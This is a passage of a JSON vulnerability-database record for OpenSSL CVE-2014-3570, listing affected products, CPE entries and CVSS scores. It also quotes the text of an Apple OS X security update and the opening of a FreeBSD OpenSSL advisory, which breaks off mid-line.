"telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.6" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.31" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-43x)0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "sparc enterprise m9000", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.00" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71939" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "CNNVD", "id": "CNNVD-201501-160" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zc", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3570" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" } ], "trust": 0.6 }, "cve": "CVE-2014-3570", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-3570", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3570", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201501-160", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3570", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3570" }, { "db": "JVNDB", "id": "JVNDB-2014-007551" }, { "db": "CNNVD", "id": "CNNVD-201501-160" }, { "db": "NVD", "id": "CVE-2014-3570" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c. OpenSSL is prone to an unspecified security weakness. \nLittle is known about this issue or its effects at this time. We will update this BID as more information emerges. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004\n\nOS X Yosemite 10.10.3 and Security Update 2015-004 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A process may gain admin privileges without properly\nauthenticating\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed with improved entitlement checking. \nCVE-ID\nCVE-2015-1130 : Emil Kvarnhammar at TrueSec\n\napache\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in Apache\nDescription: Multiple vulnerabilities existed in Apache versions\nprior to 2.4.10 and 2.2.29, including one that may allow a remote\nattacker to execute arbitrary code. These issues were addressed by\nupdating Apache to versions 2.4.10 and 2.2.29\nCVE-ID\nCVE-2013-0118\nCVE-2013-5704\nCVE-2013-6438\nCVE-2014-0098\nCVE-2014-0117\nCVE-2014-0118\nCVE-2014-0226\nCVE-2014-0231\nCVE-2014-3523\n\nATS\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: Multiple input validation issues existed in fontd. \nThese issues were addressed through improved input validation. \nCVE-ID\nCVE-2015-1131 : Ian Beer of Google Project Zero\nCVE-2015-1132 : Ian Beer of Google Project Zero\nCVE-2015-1133 : Ian Beer of Google Project Zero\nCVE-2015-1134 : Ian Beer of Google Project Zero\nCVE-2015-1135 : Ian Beer of Google Project Zero\n\nCertificate Trust Policy\nImpact: Update to the certificate trust policy\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPProtocol\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Cookies belonging to one origin may be sent to another\norigin\nDescription: A cross-domain cookie issue existed in redirect\nhandling. Cookies set in a redirect response could be passed on to a\nredirect target belonging to another origin. The issue was address\nthrough improved handling of redirects. \nCVE-ID\nCVE-2015-1089 : Niklas Keller\n\nCFNetwork Session\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Authentication credentials may be sent to a server on\nanother origin\nDescription: A cross-domain HTTP request headers issue existed in\nredirect handling. HTTP request headers sent in a redirect response\ncould be passed on to another origin. The issue was addressed through\nimproved handling of redirects. \nCVE-ID\nCVE-2015-1091 : Diego Torres (http://dtorres.me)\n\nCFURL\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: An input validation issue existed within URL\nprocessing. This issue was addressed through improved URL validation. \nCVE-ID\nCVE-2015-1088 : Luigi Galli\n\nCoreAnimation\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A use-after-free issue existed in CoreAnimation. This\nissue was addressed through improved mutex management. \nCVE-ID\nCVE-2015-1136 : Apple\n\nFontParser\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of font files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1093 : Marc Schoenefeld\n\nGraphics Driver\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A NULL pointer dereference existed in NVIDIA graphics\ndriver\u0027s handling of certain IOService userclient types. This issue\nwas addressed through additional context validation. \nCVE-ID\nCVE-2015-1137 :\nFrank Graziano and John Villamil of the Yahoo Pentest Team\n\nHypervisor\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local application may be able to cause a denial of service\nDescription: An input validation issue existed in the hypervisor\nframework. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-1138 : Izik Eidus and Alex Fishman\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted .sgi file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\n.sgi files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-1139 : Apple\n\nIOHIDFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A malicious HID device may be able to cause arbitrary code\nexecution\nDescription: A memory corruption issue existed in an IOHIDFamily\nAPI. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1095 : Andrew Church\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A buffer overflow issue existed in IOHIDFamily. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1140 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative,\nLuca Todesco\n\nIOHIDFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in IOHIDFamily that led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1096 : Ilja van Sprundel of IOActive\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A heap buffer overflow existed in IOHIDFamily\u0027s\nhandling of key-mapping properties. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2014-4404 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A null pointer dereference existed in IOHIDFamily\u0027s\nhandling of key-mapping properties. This issue was addressed through\nimproved validation of IOHIDFamily key-mapping properties. \nCVE-ID\nCVE-2014-4405 : Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5\nImpact: A user may be able to execute arbitrary code with system\nprivileges\nDescription: An out-of-bounds write issue exited in the IOHIDFamily\ndriver. The issue was addressed through improved input validation. \nCVE-ID\nCVE-2014-4380 : cunzhang from Adlab of Venustech\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause unexpected system shutdown\nDescription: An issue existed in the handling of virtual memory\noperations within the kernel. The issue is fixed through improved\nhandling of the mach_vm_read operation. \nCVE-ID\nCVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause a system denial of service\nDescription: A race condition existed in the kernel\u0027s setreuid\nsystem call. This issue was addressed through improved state\nmanagement. \nCVE-ID\nCVE-2015-1099 : Mark Mentovai of Google Inc. \n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local application may escalate privileges using a\ncompromised service intended to run with reduced privileges\nDescription: setreuid and setregid system calls failed to drop\nprivileges permanently. This issue was addressed by correctly\ndropping privileges. \nCVE-ID\nCVE-2015-1117 : Mark Mentovai of Google Inc. \n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: An attacker with a privileged network position may be able\nto redirect user traffic to arbitrary hosts\nDescription: ICMP redirects were enabled by default on OS X. This\nissue was addressed by disabling ICMP redirects. \nCVE-ID\nCVE-2015-1103 : Zimperium Mobile Security Labs\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: An attacker with a privileged network position may be able\nto cause a denial of service\nDescription: A state inconsistency existed in the processing of TCP\nheaders. This issue was addressed through improved state handling. \nCVE-ID\nCVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause unexpected system\ntermination or read kernel memory\nDescription: A out of bounds memory access issue existed in the\nkernel. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1100 : Maxime Villard of m00nbsd\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may be able to bypass network filters\nDescription: The system would treat some IPv6 packets from remote\nnetwork interfaces as local packets. The issue was addressed by\nrejecting these packets. \nCVE-ID\nCVE-2015-1104 : Stephen Roettger of the Google Security Team\n\nKernel\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1101 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A state inconsistency issue existed in the handling of\nTCP out of band data. This issue was addressed through improved state\nmanagement. \nCVE-ID\nCVE-2015-1105 : Kenton Varda of Sandstorm.io\n\nLaunchServices\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to cause the Finder to crash\nDescription: An input validation issue existed in LaunchServices\u0027s\nhandling of application localization data. This issue was addressed\nthrough improved validation of localization data. \nCVE-ID\nCVE-2015-1142\n\nLaunchServices\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A type confusion issue existed in LaunchServices\u0027s\nhandling of localized strings. This issue was addressed through\nadditional bounds checking. \nCVE-ID\nCVE-2015-1143 : Apple\n\nlibnetcore\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Processing a maliciously crafted configuration profile may\nlead to unexpected application termination\nDescription: A memory corruption issue existed in the handling of\nconfiguration profiles. This issue was addressed through improved\nbounds checking. \nCVE-ID\nCVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of\nFireEye, Inc. \n\nntp\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A remote attacker may brute force ntpd authentication keys\nDescription: The config_auth function in ntpd generated a weak key\nwhen an authentication key was not configured. This issue was\naddressed by improved key generation. \nCVE-ID\nCVE-2014-9298\n\nOpenLDAP\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A remote unauthenticated client may be able to cause a\ndenial of service\nDescription: Multiple input validation issues existed in OpenLDAP. \nThese issues were addressed by improved input validation. \nCVE-ID\nCVE-2015-1545 : Ryan Tandy\nCVE-2015-1546 : Ryan Tandy\n\nOpenSSL\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in OpenSSL\nDescription: Multiple vulnerabilities existed in OpenSSL 0.9.8zc,\nincluding one that may allow an attacker to intercept connections to\na server that supports export-grade ciphers. These issues were\naddressed by updating OpenSSL to version 0.9.8zd. \nCVE-ID\nCVE-2014-3569\nCVE-2014-3570\nCVE-2014-3571\nCVE-2014-3572\nCVE-2014-8275\nCVE-2015-0204\n\nOpen Directory Client\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A password might be sent unencrypted over the network when\nusing Open Directory from OS X Server\nDescription: If an Open Directory client was bound to an OS X Server\nbut did not install the certificates of the OS X Server, and then a\nuser on that client changed their password, the password change\nrequest was sent over the network without encryption. This issue was\naddressed by having the client require encryption for this case. \nCVE-ID\nCVE-2015-1147 : Apple\n\nPHP\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Multiple vulnerabilities in PHP\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.3.29, 5.4.38, and 5.5.20, including one which may have led to\narbitrary code execution. This update addresses the issues by\nupdating PHP to versions 5.3.29, 5.4.38, and 5.5.20. \nCVE-ID\nCVE-2013-6712\nCVE-2014-0207\nCVE-2014-0237\nCVE-2014-0238\nCVE-2014-2497\nCVE-2014-3478\nCVE-2014-3479\nCVE-2014-3480\nCVE-2014-3487\nCVE-2014-3538\nCVE-2014-3587\nCVE-2014-3597\nCVE-2014-3668\nCVE-2014-3669\nCVE-2014-3670\nCVE-2014-3710\nCVE-2014-3981\nCVE-2014-4049\nCVE-2014-4670\nCVE-2014-4698\nCVE-2014-5120\n\nQuickLook\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Opening a maliciously crafted iWork file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the handling of\niWork files. This issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-1098 : Christopher Hickstein\n\nSceneKit\nAvailable for: OS X Mountain Lion v10.8.5\nImpact: Viewing a maliciously crafted Collada file may lead to\narbitrary code execution\nDescription: A heap buffer overflow existed in SceneKit\u0027s handling\nof Collada files. Viewing a maliciously crafted Collada file may have\nled to arbitrary code execution. This issue was addressed through\nimproved validation of accessor elements. \nCVE-ID\nCVE-2014-8830 : Jose Duart of Google Security Team\n\nScreen Sharing\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: A user\u0027s password may be logged to a local file\nDescription: In some circumstances, Screen Sharing may log a user\u0027s\npassword that is not readable by other users on the system. This\nissue was addressed by removing logging of credential. \nCVE-ID\nCVE-2015-1148 : Apple\n\nSecurity - Code Signing\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: Tampered applications may not be prevented from launching\nDescription: Applications containing specially crafted bundles may\nhave been able to launch without a completely valid signature. This\nissue was addressed by adding additional checks. \nCVE-ID\nCVE-2015-1145\nCVE-2015-1146\n\nUniformTypeIdentifiers\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.2\nImpact: A local user may be able to execute arbitrary code with\nsystem privileges\nDescription: A buffer overflow existed in the way Uniform Type\nIdentifiers were handled. This issue was addressed with improved\nbounds checking. \nCVE-ID\nCVE-2015-1144 : Apple\n\nWebKit\nAvailable for: OS X Yosemite v10.10 to v10.10.2\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in WebKit. This\nissues was addressed through improved memory handling. \nCVE-ID\nCVE-2015-1069 : lokihardt@ASRT working with HP\u0027s Zero Day Initiative\n\nSecurity Update 2015-004 (available for OS X Mountain Lion v10.8.5\nand OS X Mavericks v10.9.5) also addresses an issue caused by the fix\nfor CVE-2015-1067 in Security Update 2015-002. This issue prevented\nRemote Apple Events clients on any version from connecting to the\nRemote Apple Events server. In default configurations, Remote Apple\nEvents is not enabled. \n\nOS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. \nhttps://support.apple.com/en-us/HT204658\n\nOS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg\nlhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l\n+I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6\nDudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj\ncjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW\nkHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo\npqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv\nD/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX\nkEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R\n5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b\n6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G\nvVE37tYUU4PnLfwlcazq\n=MOsT\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:01.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2015-01-14\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)\n 2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)\n 2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)\n 2015-01-09 01:11:43 UTC (stable/9, 